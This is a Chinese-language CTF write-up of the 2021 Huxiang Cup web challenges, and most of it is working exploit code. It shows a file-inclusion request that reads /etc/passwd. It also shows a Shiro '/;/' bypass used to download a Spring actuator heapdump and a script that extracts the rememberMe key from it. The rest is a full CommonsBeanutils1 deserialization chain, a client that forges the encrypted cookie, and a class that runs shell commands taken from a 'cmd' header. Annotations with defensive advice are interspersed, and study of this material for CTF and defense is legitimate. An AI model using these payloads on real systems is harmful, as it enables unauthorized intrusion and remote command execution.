2021湖湘杯web部分wp

前言

快期末了这学期准备退役了,下学期继续努力(大二课怎么这么多啊!!!期末考怎么办啊!!!一节课没听啊!!!)
今天上线看看题

easywill

这题没啥好说,跟tp3的rce差不多
直接

?name=cfile&value=/etc/passwd

就能文件包含,之后找不到flag,用拟态的那个包含pearcmd.php就能getshell

Pentest in Autumn

下个pom.xml附件 看到shiro

<?xml version="1.0" encoding="UTF-8"?>

-<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://maven.apache.org/POM/4.0.0">

<modelVersion>4.0.0</modelVersion>


-<parent>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter-parent</artifactId>

<version>2.5.4</version>

<relativePath/>

<!-- lookup parent from repository -->


</parent>

<groupId>com.demo</groupId>

<artifactId>demo</artifactId>

<version>0.0.1-SNAPSHOT</version>

<name>demo</name>

<description>Demo project for Spring Boot</description>


-<properties>

<java.version>1.8</java.version>

</properties>


-<dependencies>


-<dependency>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter</artifactId>

</dependency>


-<dependency>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter-actuator</artifactId>

<version>2.2.2.RELEASE</version>

<!-- review: actuator is pinned to 2.2.2.RELEASE while the parent is 2.5.4. The write-up reaches /actuator/heapdump without credentials (via the "/;/" path trick against Shiro) and the heapdump contains the rememberMe key. Management endpoints need their own authentication, and heapdump should be disabled or bound to a separate management port. -->

</dependency>


-<dependency>

<groupId>org.apache.shiro</groupId>

<artifactId>shiro-core</artifactId>

<version>1.5.0</version>

</dependency>


-<dependency>

<groupId>org.apache.shiro</groupId>

<artifactId>shiro-spring</artifactId>

<version>1.5.0</version>

<!-- review: Shiro 1.5.0 has no hard-coded default rememberMe key (hence "cannot be attacked directly"); the cookie is only forgeable here because the key leaked via the heapdump. After such an exposure rotate the key, and do not let rememberMe native-deserialize untrusted input (ObjectInputFilter, or a non-Java-serialization cookie format). -->

</dependency>

<!-- shiro ehcache -->



-<dependency>

<groupId>org.apache.shiro</groupId>

<artifactId>shiro-ehcache</artifactId>

<version>1.5.0</version>

</dependency>


-<dependency>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter-test</artifactId>

<scope>test</scope>

</dependency>


-<dependency>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-starter-web</artifactId>

<version>2.5.4</version>

<scope>compile</scope>

</dependency>

</dependencies>


-<build>


-<plugins>


-<plugin>

<groupId>org.springframework.boot</groupId>

<artifactId>spring-boot-maven-plugin</artifactId>

</plugin>

</plugins>

</build>

</project>

spring和shiro,shiro版本有点高,没法直接打。

有个actuator泄露

1636882499301.png

找到这篇博客

https://www.cnblogs.com/icez/p/Actuator_heapdump_exploit.html

下到heapdump就能弄到密钥,文章里也给了处理脚本

直接访问无法下载,用shiro未授权

/;/actuator/heapdump

成功下载

用文章里的工具找到密钥,并用脚本处理

import base64
import struct

# Re-packs the 16 key bytes as they appear in the heapdump (Java byte[] values are
# signed, hence the '<bbbb...' format) into the base64 string that Client.java
# below decodes.  Defensively: the key is the only secret protecting rememberMe,
# so once a heapdump has been exposed it must be rotated.
print(base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb',-42,28,62,68,-37,-114,31,-124,114,-99,77,16,-61,63,-83,78)))

拿到key就好办了,之后就是cb1的shiro链子配合spring的通用回显即可

package shiroatack;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import java.util.PriorityQueue;

/**
 * Builds the serialized object graph the write-up calls the "cb1" chain
 * (CommonsBeanutils1 style): a {@link PriorityQueue} whose {@link BeanComparator}
 * reads the {@code outputProperties} bean property of a {@link TemplatesImpl}
 * that carries the class bytes of {@code SpringEvil}.
 *
 * <p>Defender's view: this only fires because the receiving side runs native Java
 * deserialization on the rememberMe cookie and the AES key protecting that cookie
 * leaked. Keeping the key secret, rotating it after a heapdump exposure, and
 * filtering deserialization ({@code ObjectInputFilter}) are the controls.
 */
public class CCShiro {
    /**
     * Reflectively overwrites a field declared directly on {@code obj}'s class
     * (superclass fields are not searched), private ones included.
     *
     * @param obj       object whose field is written
     * @param fieldName name of the declared field
     * @param value     new value
     * @throws Exception {@code NoSuchFieldException} / {@code IllegalAccessException}
     *                   from the reflection calls
     */
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

    /**
     * Serializes the gadget graph.
     *
     * @param code class-file bytes of the translet to embed (here {@code SpringEvil})
     * @return the Java-serialized {@link PriorityQueue}, as consumed by {@code Client}
     * @throws Exception reflection or serialization failure
     */
    public byte[] getPayload(byte[] code) throws Exception {
        // TemplatesImpl holding the class bytes; _name and _tfactory are populated
        // as well (presumably both are dereferenced on the path that defines the class).
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{code});
        setFieldValue(obj, "_name", "HelloTemplatesImpl");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());

        // A JDK comparator is supplied so the serialized graph references no
        // commons-collections class (presumably why the CC imports above are unused).
        final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);
        final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
        // stub data for replacement later
        // Two placeholder elements give the queue a heap to re-order on readObject().
        queue.add("1");
        queue.add("1");

        // The real property name and elements are swapped in only after add(), so the
        // comparator is not triggered while building the graph locally.
        setFieldValue(comparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{obj, obj});
        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(queue);
        oos.close(); // NOTE(review): not closed on exception; try-with-resources would be cleaner.

        return barr.toByteArray();
    }
}

Client.java

package shiroatack;

import javassist.ClassPool;
import javassist.CtClass;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;

//public class Client {
//    public static void main(String []args) throws Exception {
//        ClassPool pool = ClassPool.getDefault();
//        CtClass clazz = pool.get(shiroatack.Evil.class.getName());
//        byte[] payloads = new CCShiro().getPayload(clazz.toBytecode());
//
//        AesCipherService aes = new AesCipherService();
//        byte[] key = java.util.Base64.getDecoder().decode("kHLjXF0g5vdRE0X+oO6Uqg==");
//
//        ByteSource ciphertext = aes.encrypt(payloads, key);
//        System.out.printf(ciphertext.toString());
//    }
//}
import javassist.ClassPool;
import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.util.ByteSource;
import java.util.Base64;

/**
 * Produces the final rememberMe value used in the write-up: the serialized graph
 * from {@link CCShiro} is AES-encrypted with the key recovered from the heapdump
 * and printed (Shiro's {@code ByteSource.toString()} renders base64).
 *
 * <p>The key is the only thing standing between an unauthenticated client and
 * this cookie, which is why the exposed heapdump — not Shiro 1.5.0 itself — was
 * the actual finding.
 */
public class Client {
    /**
     * @param args unused
     * @throws Exception propagated from {@link CCShiro#getPayload(byte[])} or Shiro's cipher
     */
    public static void main(String[] args) throws Exception{
        // Pre-compiled class-file bytes of SpringEvil (source listed further down), base64-encoded.
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAuQoALwBfCgBgAGEKAGAAYggAYwoAZABlCABmBwBnCgAHAGgHAGkKAGoAawgAbAgAbQgAbggAbwgATQoABwBwCABxCABOBwByCgBqAHMIAFAIAHQKAHUAdgoAEwB3CAB4CgATAHkIAHoIAHsKABMAfAgAfQgAfggAfwgAgAoACQCBCACCBwCDCgCEAIUKAIQAhgoAhwCICgAkAIkIAIoKACQAiwoAJACMCACNCACOBwCPBwCQAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABFMcm9tZS9TcHJpbmdFdmlsOwEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwCRAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAY8aW5pdD4BAAMoKVYBAAFjAQARTGphdmEvbGFuZy9DbGFzczsBAAFtAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBAAFvAQASTGphdmEvbGFuZy9PYmplY3Q7AQACbTEBAARyZXNwAQADcmVxAQAJZ2V0V3JpdGVyAQAJZ2V0SGVhZGVyAQAGd3JpdGVyAQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQAIY29tbWFuZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQALY2hhcnNldE5hbWUBAA1TdGFja01hcFRhYmxlBwCPBwBnBwCSBwBpBwByBwBTBwCTAQAKU291cmNlRmlsZQEAD1NwcmluZ0V2aWwuamF2YQwAQgBDBwCUDACVAJYMAJcAmAEAPG9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQucmVxdWVzdC5SZXF1ZXN0Q29udGV4dEhvbGRlcgcAmQwAmgCbAQAUZ2V0UmVxdWVzdEF0dHJpYnV0ZXMBAA9qYXZhL2xhbmcvQ2xhc3MMAJwAnQEAEGphdmEvbGFuZy9PYmplY3QHAJIMAJ4AnwEAQG9yZy5zcHJpbmdmcmFtZXdvcmsud2ViLmNvbnRleHQucmVxdWVzdC5TZXJ2bGV0UmVxdWVzdEF0dHJpYnV0ZXMBAAtnZXRSZXNwb25zZQEACmdldFJlcXVlc3QBAB1qYXZheC5zZXJ2bGV0LlNlcnZsZXRSZXNwb25zZQwAoACdAQAlamF2YXguc2VydmxldC5odH
RwLkh0dHBTZXJ2bGV0UmVxdWVzdAEAEGphdmEvbGFuZy9TdHJpbmcMAKEAogEAB29zLm5hbWUHAKMMAKQApQwApgCnAQAGd2luZG93DACoAKkBAANHQksBAAVVVEYtOAwAqgCnAQADV0lOAQACL2MBAAcvYmluL3NoAQACLWMMAKsArAEAB3ByaW50bG4BABFqYXZhL3V0aWwvU2Nhbm5lcgcArQwArgCvDACwALEHALIMALMAtAwAQgC1AQACXEEMALYAtwwAuACnAQAFZmx1c2gBAAVjbG9zZQEAD3JvbWUvU3ByaW5nRXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAAlsb2FkQ2xhc3MBACUoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvQ2xhc3M7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAEWdldERlY2xhcmVkTWV0aG9kAQANc2V0QWNjZXNzaWJsZQEABChaKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAC3RvVXBwZXJDYXNlAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBACooTGphdmEvaW8vSW5wdXRTdHJlYW07TGphdmEvbGFuZy9TdHJpbmc7KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0ACEALgAvAAAAAAADAAEAMAAxAAIAMgAAAD8AAAADAAAAAbEAAAACADMAAAAGAAEAAAAWADQAAAAgAAMAAAABADUANgAAAAAAAQA3ADgAAQAAAAEAOQA6AAIAOwAAAAQAAQA8AAEAMAA9AAIAMgAAAEkAAAAEAAAAAbEAAAACADMAAAAGAAEAAAAbADQAAAAqAAQAAAABADUANgAAAAAAAQA3ADgAAQAAAAEAPgA/AAIAAAABAEAAQQADADsAAAAEAAEAPAABAEIAQwACADIAAALDAAkADQAAAXsqtwABuAACtgADEgS2AA
VMKxIGA70AB7YACE0sAQO9AAm2AApOuAACtgADEgu2AAVMKxIMA70AB7YACE0rEg0DvQAHtgAIOgQsLQO9AAm2AAo6BRkELQO9AAm2AAo6BrgAArYAAxIOtgAFEg8DvQAHtgAQOge4AAK2AAMSEbYABRISBL0AB1kDEhNTtgAQOggZCAS2ABQZBwS2ABQZBxkFA70ACbYACjoJGQgZBgS9AAlZAxIVU7YACsAAEzoKBr0AEzoLEha4ABe2ABgSGbYAGpkACBIbpwAFEhw6DBIWuAAXtgAdEh62ABqZABIZCwMSFVMZCwQSH1OnAA8ZCwMSIFMZCwQSIVMZCwUZClMZCbYAIhIjBL0AB1kDEhNTtgAQGQkEvQAJWQO7ACRZuAAlGQu2ACa2ACcZDLcAKBIptgAqtgArU7YAClcZCbYAIhIsA70AB7YAEBkJA70ACbYAClcZCbYAIhItA70AB7YAEBkJA70ACbYAClexAAAAAwAzAAAAbgAbAAAAHAAEAB0AEAAeABsAHwAlACAAMQAhADwAIgBIACMAUwAkAF8AJQB1ACYAkAAnAJYAKACcACkAqQAqAL4AKwDEACwA3QAtAO0ALgDzAC8A/AAxAQIAMgEIADQBDgA1AUoANgFiADcBegA4ADQAAACEAA0AAAF7ADUANgAAABABawBEAEUAAQAbAWAARgBHAAIAJQFWAEgASQADAEgBMwBKAEcABABTASgASwBJAAUAXwEcAEwASQAGAHUBBgBNAEcABwCQAOsATgBHAAgAqQDSAE8ASQAJAL4AvQBQAFEACgDEALcAUgBTAAsA3QCeAFQAUQAMAFUAAAA4AAT/ANkADAcAVgcAVwcAWAcAWQcAWAcAWQcAWQcAWAcAWAcAWQcAWgcAWwAAQQcAWvwAIAcAWgsAOwAAAAQAAQBcAAEAXQAAAAIAXg==");
        byte[] payloads = new CCShiro().getPayload(code);
        AesCipherService aes = new AesCipherService();
        // The rememberMe AES key, base64 — the value produced by the Python snippet above.
        byte[] key = Base64.getDecoder().decode("vpDnFv8IV/zz5V+uAjg2kQ==");// replace the key here
        ByteSource ciphertext = aes.encrypt(payloads,key);
        System.out.println(ciphertext.toString());
    }
}


获得字节码的类:(spring通用回显)

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.net.InetAddress;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectOutputStream;
import java.io.*;
import java.lang.reflect.Method;
import java.util.Scanner;

/**
 * The class whose bytes are embedded in {@code TemplatesImpl._bytecodes}. When the
 * gadget chain instantiates it, the constructor runs a shell command taken from the
 * request's {@code cmd} header and writes the output into the current Spring
 * response — the "universal echo" the write-up refers to. All Spring and servlet
 * types are resolved reflectively through the thread context class loader,
 * presumably so this file compiles without those jars on the classpath.
 *
 * <p>Detection note: a request carrying a {@code cmd} header that the application
 * never defines, together with an unusually large rememberMe cookie, is the
 * observable footprint of this technique on the wire.
 */
public class SpringEvil extends AbstractTranslet
{
    /** Required by {@link AbstractTranslet}; intentionally empty — all work is in the constructor. */
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    /** Required by {@link AbstractTranslet}; intentionally empty. */
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    /**
     * Runs on instantiation (TemplatesImpl creates the translet through its no-arg
     * constructor).
     *
     * @throws Exception any reflection or I/O failure; outside a Spring-bound request
     *                   thread {@code getRequestAttributes()} presumably returns
     *                   {@code null} and the later invokes fail
     */
    public SpringEvil() throws Exception{
        // Current request/response from Spring's thread-local RequestContextHolder.
        // NOTE(review): raw Class; Class<?> would avoid the unchecked warning.
        Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
        Method m = c.getMethod("getRequestAttributes");
        Object o = m.invoke(null);
        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
        m = c.getMethod("getResponse");
        Method m1 = c.getMethod("getRequest");
        Object resp = m.invoke(o);
        Object req = m1.invoke(o); // HttpServletRequest
        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
        getHeader.setAccessible(true);
        getWriter.setAccessible(true);
        Object writer = getWriter.invoke(resp);
        // The command comes from the "cmd" request header; null when the header is absent.
        String cmd = (String)getHeader.invoke(req, "cmd");
        String[] commands = new String[3];
        // os.name is inspected twice with different casing; both checks agree on Windows.
        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
            commands[0] = "cmd";
            commands[1] = "/c";
        } else {
            commands[0] = "/bin/sh";
            commands[1] = "-c";
        }
        commands[2] = cmd;
        // Reads the process's whole stdout ("\\A" delimiter) and prints it to the response.
        // NOTE(review): Scanner.next() throws NoSuchElementException when the command produces no output.
        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
        writer.getClass().getDeclaredMethod("flush").invoke(writer);
        writer.getClass().getDeclaredMethod("close").invoke(writer);
    }
}





运行client.java payload如下图打shiro

1636883274651.png
这个通用回显真好用,这几次比赛全是spring,都能直接回显
